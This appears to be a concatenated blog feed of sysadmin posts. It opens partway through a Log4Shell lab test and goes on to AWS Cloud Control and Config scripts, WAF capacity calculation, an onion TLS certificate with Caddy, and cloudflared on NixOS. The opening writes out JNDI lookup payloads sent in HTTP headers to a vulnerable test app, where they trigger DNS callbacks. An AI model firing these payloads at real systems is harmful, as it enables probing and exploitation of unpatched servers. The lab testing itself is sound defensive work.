curl -IL app-server-ip:8080 -H 'X-Api-Version: foo'
The app server should respond HTTP 200. The header must be X-Api-Version
because that’s what configured in the log4shell-vulnerable-app.
Once the connection is verified, we can now instruct it to make a DNS request to our Unbound DNS.
curl -L app-server-ip:8080 -H 'X-Api-Version: ${jndi:dns://dns-server-ip/evil-request}'
In the Unbound’s log, the query should be listed.
journalctl -xe -u unbound# Dec 14 01:23:45 ip-a-b-c-d unbound[pid]: [pid:0] info: app-server-ip evil-request. A IN
If you want to see the query log in realtime, journalctl -xe -u unbound -f
. If it’s not listed, check the inbound firewall rule applied to the DNS server.
curl -L https://target-server-domain -H 'User Agent: ${jndi:dns://dns-server-ip/should-not-show-up-in-the-log}'
]]>aws cloudcontrol create-resource
to launch EC2 and Lambda, instead of using aws ec2 run-instances
and aws lambda create-function
.Aside from CRUD operations, it also supports List operation to discover all deployed resources filtered by a specific resource type (e.g. AWS::ECS::Cluster
). When I first read the announcement, I wonder how it compares to AWS Config, a feature I’m actively using mainly for security audit, but it could also perform inventory task.
Since Cloud Control is a recent feature, the latest library is required. For Python library, I ran pip install boto3 --upgrade
to update it to version xxx. Then, I created a minimal Python script to test out Cloud Control’s ListResources.
#!/usr/bin/env python# ./cloud-control.py --profile profile-name --region region-namefrom argparse import ArgumentParserimport boto3from botocore.config import Configfrom itertools import countfrom json import dump, loadsparser = ArgumentParser(description = 'Find the latest AMIs.')parser.add_argument('--profile', '-p', help = 'AWS profile name. Parsed from ~/.aws/config (SSO) or credentials (API key).', required = True)parser.add_argument('--region', '-r', help = 'AWS Region, e.g. us-east-1', required = True)args = parser.parse_args()profile = args.profileregion = args.regionsession = boto3.session.Session(profile_name = profile)my_config = Config(region_name = region)client = session.client('cloudcontrol', config = my_config)results = []response = {}for i in count(): # https://docs.aws.amazon.com/cloudcontrolapi/latest/APIReference/API_ListResources.html params = { # https://docs.aws.amazon.com/cloudcontrolapi/latest/userguide/supported-resources.html 'TypeName': 'AWS::EC2::FlowLog' } if i == 0 or 'NextToken' in response: if 'NextToken' in response: params['NextToken'] = response['NextToken'] response = client.list_resources(**params) results.extend(response['ResourceDescriptions']) else: breakprop_list = []# Extract properties onlyfor ele in results: prop_list.append(loads(ele['Properties']))if len(prop_list) >= 1: with open('cloud-control.json', 'w') as w: # Save the first dictionary only dump(dict(sorted(prop_list[0].items())), w, indent = 2)
In the first draft of the script, I noticed that the API doesn’t support AWS::EC2::Instance
yet. It took me a while to troubleshoot until I found this list of supported resources. The error wasn’t very helpful, e.g. “Resource type AWS::EC2::Instance does not support LIST action”. It’s more straightforward to just say “Resource type xxx does not support Cloud Control yet”.
The announcement did mention not all resources are supported, but I didn’t expect AWS’ bread and butter are unsupported, including AWS::S3::Bucket
. I’m sure these resources will be supported eventually, it’s just that support of new products are prioritised at the moment as implied from the announcement, “It will support new AWS resources typically on the day of launch”.
I tested on AWS::EC2::PrefixList
, instead of the currently unsupported AWS::EC2::Instance
. It worked fine, the output syntax is exactly what the documentation outlines. To compare it to Config, I created another equivalent script.
#!/usr/bin/env python# ./aws-config.py --profile profile-name --account-id {account-id} --region region-namefrom argparse import ArgumentParserimport boto3from botocore.config import Configfrom itertools import countfrom json import dump, loadsparser = ArgumentParser(description = 'Find the latest AMIs.')parser.add_argument('--profile', '-p', help = 'AWS profile name. Parsed from ~/.aws/config (SSO) or credentials (API key).', required = True)parser.add_argument('--account-id', '-a', help = 'AWS account ID. See ~/.aws/config if SSO is used.', required = True, type = str)parser.add_argument('--region', '-r', help = 'AWS Region, e.g. us-east-1', required = True)args = parser.parse_args()profile = args.profileaccount_id = args.account_idregion = args.regionsession = boto3.session.Session(profile_name = profile)my_config = Config(region_name = region)client = session.client('config', config = my_config)results = []response = {}for i in count(): params = { 'Expression': "SELECT configuration WHERE resourceType = 'AWS::EC2::FlowLog'" \ f" AND accountId = '{account_id}'" \ f" AND awsRegion = '{region}'", 'ConfigurationAggregatorName': 'ConfigAggregator' # may need to update } if i == 0 or 'NextToken' in response: if 'NextToken' in response: params['NextToken'] = response['NextToken'] response = client.select_aggregate_resource_config(**params) results.extend(response['Results']) else: breakconf_list = []# Extract configuration onlyfor ele in results: conf_list.append(loads(ele).get('configuration', {}))if len(conf_list) >= 1: with open('aws-config.json', 'w') as w: # Save the first dictionary only dump(dict(sorted(conf_list[0].items())), w, indent = 2)
Before I get to the output comparison, notice the accountId
and awsRegion
filters I used in the SQL statement. It’s necessary because I’m using an aggregator that collects data from all accounts and regions in an AWS Organization (which have AWS Config enabled). Like most other AWS APIs, Cloud Control only works on a combination of account and region. If you want discover resources in 5 combinations of account and region, that’ll requires 5 API calls, in contrast to just one API call via Config’s aggregator.
Here is the output of Cloud Control:
{ "DeliverLogsPermissionArn": String, "Id": String, "LogDestination": String, "LogDestinationType": String, "LogFormat": String, "LogGroupName": String, "MaxAggregationInterval": Integer, "ResourceId": String, "ResourceType": String, "Tags": [ Tag, ... ], "TrafficType": String}
Config:
{ "creationTime": Float, "deliverLogsPermissionArn": String, "deliverLogsStatus": String, "flowLogId": String, "flowLogStatus": String, "logDestination": String, "logDestinationType": String, "logFormat": String, "logGroupName": String, "maxAggregationInterval": Float, "resourceId": String, "tags": [ Tag, ... ], "trafficType": String}
Syntax used by CloudFormation template:
{ "DeliverLogsPermissionArn" : String, "LogDestination" : String, "LogDestinationType" : String, "LogFormat" : String, "LogGroupName" : String, "MaxAggregationInterval" : Integer, "ResourceId" : String, "ResourceType" : String, "Tags" : [ Tag, ... ], "TrafficType" : String}
]]>How do I check the patch level of my EC2 instances?
AWS Config is introduced as the answer to the above question, in addition to other compliance requirements. This feature enables a security analyst to query across all accounts (of an organisation) and regions through a single interface. Prior to this feature, you would use SSM to query each and every account and region, which is not efficient.
It includes a comprehensive list of AWS-managed rules, which should meet most compliance requirements, though you can also create a custom rule using a Lambda function. Depending on a company’s industry and regulatory requirements, you could also utilise Conformance Pack which is a set of AWS-managed rules designed to meet certain requirement, e.g. FDA, HIPAA, NIST, PCI DSS.
Compliance report is downloaded using SQL statement. There are two scopes to choose from: either a chosen combination of account and region or organisation level (also known as Configuration Aggregator). To query resource compliance, use AWS::Config::ResourceCompliance
resource type. There are many examples included in the Console, you could also run a custom SQL statement using Advanced Query.
In addition to resource compliance, you can also use it to build inventories. For example, you can use AWS::EC2::Instance
resource type to list all EC2 instances. So, it can functions as a compliance tool and also an inventory tool.
A major limitation (as listed in the docs) is that you cannot query compliant-only (or non-compliant-only) resources of a compliance rule, e.g. AND
operator may return result of OR
instead.
To get the actual result, you still need some post-processing to filter out irrelevant entries. I wrote a script to list all enabled rules in an organisation (aws-config-rules.py) and another script to query the output of some of those rules (aws-config.py).
]]>While individual and total WCU are shown during ACL creation/modification on the management console, a read-only role could only check the total WCU. It may be possible to use CheckCapacity
CLI or API by separating each rule as an ACL, but that’ll involve excessive (online) API calls.
I further improved my script waf-acl.py by implementing offline WCU calculation. While the AWS docs has a complete list of WCU of each match statement, I find the text transformation part is not clear enough.
For each Text transformation that you apply, add 10 WCUs.
It implies that any time you use text transformation, you gotta add 10 units. When I used this assumption, my calculation was off by a mile. It is more accurate to say:
For each unique Text transformation that you apply, add 10 WCUs.
For the purpose of WCU, a text transformation is actually made up of two components: request component and transformation action.
For example, URI path (request component) is transformed to lowercase (a transformation action), (URI path + lowercase)
are considered as one unique text transformation. (URI path + lowercase)
can be applied multiple times within a rule (through nested statements) and even within an ACL, it will still be counted one transformation only.
This means I need to account for repeated text transformation within a rule, so that it’s calculated only once. This is easily achieved through the use of Python Sets. The same applies when calculating total WCU of an ACL. When a unique text transformation is applied across different rules in an ACL, the sum of all rules’ WCU will be less than the ACL’s WCU.
When transforming a Header, it’s counted based on a specific header. For example, rule A has (Header(User-Agent) + lowercase)
and rule B has (Header(Cookies) + lowercase)
, these are counted as two transformations, so they’ll use 20 WCUs.
.onion
TLS certificate. The cert is of domain validation (DV) type, significantly easier to purchase and cheaper than Digicert’s extended validation (EV) cert, which was previously the only CA that supports .onion.The post links to an excellent tutorial. Different from the tutorial, I prefer to use ECDSA cert than RSA, just like Cloudflare’s cert. It includes nginx config, whereas I’m using Caddy web server.
# Generate an elliptic-curve private key$ openssl ecparam -name prime256v1 -genkey -noout -out myonion.key# prime256v1 is also used by Cloudflare# Generate a CSR$ openssl req -new -key myonion.key -out myonion.csr# Leave everything blank by entering a dot (.), except for Common Name (CN)# Enter your onion address in CN field
respond
instead.http://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8080 { bind ::1 # Harica CA domain validation @harica path /.well-known/pki-validation/xxx respond @harica "yyy"}
Restart Caddy and check the path has correct response. `curl http://localhost:8080/.well-known/pki-validation/xxx -H “Host: your-onion.onion”
After HARICA verified my onion, I received an email notification that it’s ready for purchase and download.
Download the PEM bundle.
$ cat pem-bundle.pem cross-cert.pem > fixed-pem-bundle.pem
Upload “.pem” and “.key” to the server. chown
it to the Caddy system user and chmod 600
.
Install the cert in Caddy. Site address has to be separated to HTTP and HTTPS blocks due to the use of custom port. When custom port is not used, Caddy listens on port 80 and 443 by default.
# HTTPhttp://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8080 { bind ::1 # Redirect to HTTPS redir https://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion{uri} permanent # HSTS (optional) header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"}# HTTPSxw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8079 { bind ::1 tls /var/lib/caddy/myonion.pem /var/lib/caddy/myonion.key header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" @harica path /.well-known/pki-validation/xxx respond @harica "yyy"}
services.tor = { enable = true; relay.onionServices = { myonion = { version = 3; map = [{ port = 80; target = { addr = "[::1]"; port = 8080; }; } { port = 443; target = { addr = "[::1]"; port = 8079; }; }]; }; };};
]]>A quick recap on two of the main components of NixOS: module and package. A package is a program that is available on NixOS repository, the repo doesn’t contain the binary, it’s made up of nix files that describe how to compile it. In this case, cloudflared.nix is a script to download the source code from GitHub and compile it as a Go program.
A module is (usually) used to install a program as a service and make it configurable via configuration.nix
. For example, i2pd.nix module installs i2pd package (pkgs.i2pd
) when services.i2pd.enable
is enabled.
A major issue is that GitHub doesn’t support IPv6 yet, so my IPv6-only instance couldn’t download the source code. A common workaround is to mirror the repo somewhere else that does support IPv6, which is what I did. Then, I created a new custom package nix:
{ lib, buildGoModule, fetchgit }:buildGoModule rec { pname = "cloudflared"; version = "2021.6.0"; src = fetchgit { url = "https://example.com/example/cloudflared-mirror.git"; rev = "refs/tags/${version}"; sha256 = "sha256-cX0kdBPDgwjHphxGWrnXohHPp1nzs4SnvCry4AxMtp0="; }; vendorSha256 = null; doCheck = false; buildFlagsArray = "-ldflags=-X main.Version=${version}"; meta = with lib; { description = "CloudFlare Argo Tunnel daemon (and DNS-over-HTTPS client)"; homepage = "https://www.cloudflare.com/products/argo-tunnel"; license = licenses.unfree; platforms = platforms.unix; maintainers = [ maintainers.thoughtpolice maintainers.enorris ]; };}
In my cloudflared module, I updated the following lines:
options.services.argoWeb = { enable = mkEnableOption "Cloudflare Argo Tunnel"; config = mkOption { default = "/etc/caddy/argoWeb.yml"; type = types.str; description = "Path to cloudflared config"; }; dataDir = mkOption { default = "/var/lib/argoWeb"; type = types.path; description = '' The data directory, for storing credentials. ''; };+ package = mkOption {+ default = pkgs.cloudflared;+ defaultText = "pkgs.cloudflared";+ type = types.package;+ description = "cloudflared package to use.";+ }; };- ExecStart = "${pkgs.cloudflared}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";+ ExecStart = "${cfg.package}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";
Finally, in my configuration.nix
, I configured it to use the custom package:
require = [ /etc/caddy/argoWeb.nix ]; nixpkgs.config.allowUnfree = true; services.argoWeb = { enable = true;+ package = pkgs.callPackage (import /etc/caddy/cloudflared-custom.nix) { }; config = "/etc/caddy/argoWeb.yml"; };
]]>The script is available here. It currently only supports Cloudfront ACL, feel free to extend it to support regional ACL.
(Edit: 1 Sep 2021) regional ACL is now supported.
The underlying format of a web ACL is JSON. In this use case, I’m only concern with two keys:
{ "Name": "", "Rules": [ { "Name": "", "Statement": {}, "Action": { "Block": {} } }, { "Name": "", "Statement": {}, "Action": { "Allow": {} } } ]}
The script names each ACL according to the value of “Name”. “Rules” is an array of objects, where each object represents a rule. Each rule has an action of count, allow or block.
In each rule, there is a statement and it functions as a matching condition. Each statement can contain one or match statements combined using logical rule (AND, NOT, OR).
A converted ACL has an array of objects, each object has three keys.
[ { "Name": "", "Action": "", "Rule": "" }]
{ "Name": "ruleA", "Statement": { "OrStatement": { "Statements": [ { "foo": {} }, { "bar": {} } ] } }}
{ "ruleA": "foo OR bar"}
{ "Name": "ruleA", "Statement": { "AndStatement": { "Statements": [ { "OrStatement": { "Statements": [ { "foo": {} }, { "bar": {} } ] } }, { "baz": {} } ] } }}
{ "ruleA": "(foo OR bar) AND baz"}
{ "Name": "ruleA", "Statement": { "NotStatement": { "Statement": { "foo": {} } } }}
{ "ruleA": "NOT foo"}
{ "ByteMatchStatement": { "SearchString": ".conf", "FieldToMatch": { "UriPath": {} }, "PositionalConstraint": "ENDS_WITH" }}
UriPath=ENDSWITH(.conf)
]]>It operates through a Cloudflare daemon (cloudflared) that a user installs in a server. The daemon creates outbound tunnel(s) to the CDN and forward incoming request to the local web server. It is available for free since April 2021. However, the latest NixOS at that time was 20.09 and it shipped an older version of the daemon that didn’t support static tunnel.
Static tunnel is a feature introduced in v2020.9.3 that associate a tunnel with a static subdomain (UUID.cfargotunnel.com) that a user can CNAME a website to; without this feature, cloudflared had to recreate DNS record every time a tunnel reconnects.
I can now use the newer daemon after my recent upgrade to NixOS 21.05.
Generate a new cert.pem from dashboard. This is only required to create a new tunnel. When creating a new tunnel, cloudflared also generate a credentials file (UUID.json) that you use to run a tunnel, so you don’t have upload the cert.pem to your server. Since tunnel can be created anywhere, you can do it from your workstation.
Grab the cloudflared binary from Cloudflare and make it executable without installing it to “/usr/bin”.
This step can be done on your local machine, the actual installation on a server comes later. Once cloudflared binary and cert.pem are downloaded, proceed to creating a new tunnel.
./cloudflared tunnel --origincert cert.pem create mytunnel
A new UUID.json will be generated in the current folder.
Create a new yml file.
tunnel: mytunnelcredentials-file: /var/lib/argoWeb/uuid.json# Optional# loglevel: warningress: - hostname: mdleom.com service: http://localhost:4430 - hostname: www.mdleom.com service: http://localhost:4430 - service: http_status:404
The last entry is intentionally left without a hostname
key as required by cloudflared. Usually, it’s configured with http_status:404
so cloudflared returns that status if there is no matching destination hostname for an incoming request. This can happen when say you have a foo.example.com DNS record that points to the daemon, so incoming request does reach the daemon, but either you forgot to configure the daemon to route the traffic to the actual foo.example.com web server or the web server is not running at all. In that case, the daemon will return a HTTP 404 status.
Create a new user and group named “argoWeb” in the server.
users = { users = { argoWeb = { home = "/var/lib/argoWeb"; createHome = true; isSystemUser = true; group = "argoWeb"; }; }; groups = { caddyProxy.members = [ "argoWeb" ]; };};
Once argoWeb
is created via nixos-rebuild, upload and move the json file to “/var/lib/argoWeb” folder. chown argoWeb:argoWeb
and chmod 600
that file.
Then, Create a new nix file; in this case, I’m using “/etc/caddy/“ folder (where I put other *.nix files):
{ config, lib, pkgs, ... }:with lib;let cfg = config.services.argoWeb;in { options.services.argoWeb = { enable = mkEnableOption "Cloudflare Argo Tunnel"; config = mkOption { default = "/etc/caddy/argoWeb.yml"; type = types.str; description = "Path to cloudflared config"; }; dataDir = mkOption { default = "/var/lib/argoWeb"; type = types.path; description = '' The data directory, for storing credentials. ''; }; package = mkOption { default = pkgs.cloudflared; defaultText = "pkgs.cloudflared"; type = types.package; description = "cloudflared package to use."; }; }; config = mkIf cfg.enable { systemd.services.argoWeb = { description = "Cloudflare Argo Tunnel"; after = [ "network-online.target" ]; wants = [ "network-online.target" ]; # systemd-networkd-wait-online.service wantedBy = [ "multi-user.target" ]; serviceConfig = { ExecStart = "${cfg.package}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run"; Type = "simple"; User = "argoWeb"; Group = "argoWeb"; Restart = "on-failure"; RestartSec = "5s"; NoNewPrivileges = true; LimitNPROC = 512; LimitNOFILE = 1048576; PrivateTmp = true; PrivateDevices = true; ProtectHome = true; ProtectSystem = "full"; ReadWriteDirectories = cfg.dataDir; }; }; };}
Move the yml file to “/etc/caddy/“ and set both yml and nix files to be chown root:root
and chmod 644
.
Bind the web server to localhost (“127.0.0.1” or “::1”) and optionally disable the tls. If Cloudflare’s authenticated origin pull (client authentication) is configured, that should still work if you prefer to leave tls on, though I haven’t test it. You don’t have to bind it to localhost if you insist so, but it defeats the security purpose of Argo.
mdleom.com:4430 www.mdleom.com:4430 { bind 127.0.0.1 tls /var/lib/caddyProxy/mdleom.com.pem /var/lib/caddyProxy/mdleom.com.key { protocols tls1.3 client_auth { mode require_and_verify trusted_ca_cert_file /var/lib/caddyProxy/origin-pull-ca.pem } }}
Restart/reload Caddy for the changed config to take effect.
If your NixOS instance is IPv6-only, you may want to use a custom package. pkgs.cloudflared
is installed by compiling the source from the GitHub repo, instead of using a cached binary from Nix repo. cloudflared’s license restricts the distribution of binary, hence the need of source compilation. However, GitHub doesn’t support IPv6 yet, so we need to clone its repo to other Git repo that supports IPv6 and then download it from there.
require = [ /etc/caddy/argoWeb.nix];# cloudflared is not distributed via a free software licensenixpkgs.config.allowUnfree = true;services.argoWeb = { enable = true; config = "/etc/caddy/argoWeb.yml"; # custom package # package = pkgs.callPackage (import /etc/caddy/cloudflared-custom.nix) { };};
The last step is to create a new DNS record to CNAME the relevant hostname to UUID.cfargotunnel.com . Existing A/CNAME must be removed beforehand since a hostname cannot have both A and CNAME records at the same time, nor having two similar CNAMEs.
]]>Either isNormalUser
or isSystemUser
must now be set. This mainly affects service user (user that is created solely to run a service).
users = { users = { fooService = { home = "/var/www"; createHome = true;+ isSystemUser = true; }; }; };
I have a “/var/www“ folder which I use to serve this website. Previously, chmod +xr
was persistent but now NixOS always set the permission of a user’s home folder to be chmod 700
every time nixos-rebuild
is executed. As a workaround, I have to configure nix to execute chmod after nixos-rebuild
and during boot.
system.activationScripts = { www-data.text = '' chmod +xr "/var/www" '';};
Some settings have been renamed:
map.*.toHost
→ map.*.target.addr
services.tor = { enable = true; enableGeoIP = false;- hiddenServices = {- myOnion = {- version = 3;- map = [- {- port = "80";- toHost = "[::1]";- toPort = "8080";- }- ];- }- }- extraConfig =- ''- ClientUseIPv4 0- ClientUseIPv6 1- ClientPreferIPv6ORPort 1- '';+ relay.onionServices = {+ myOnion = {+ version = 3;+ map = [{+ port = 80;+ target = {+ addr = "[::1]";+ port = 8080;+ };+ }];+ };+ };+ settings = {+ ClientUseIPv4 = false;+ ClientUseIPv6 = true;+ ClientPreferIPv6ORPort = true;+ }; };
]]>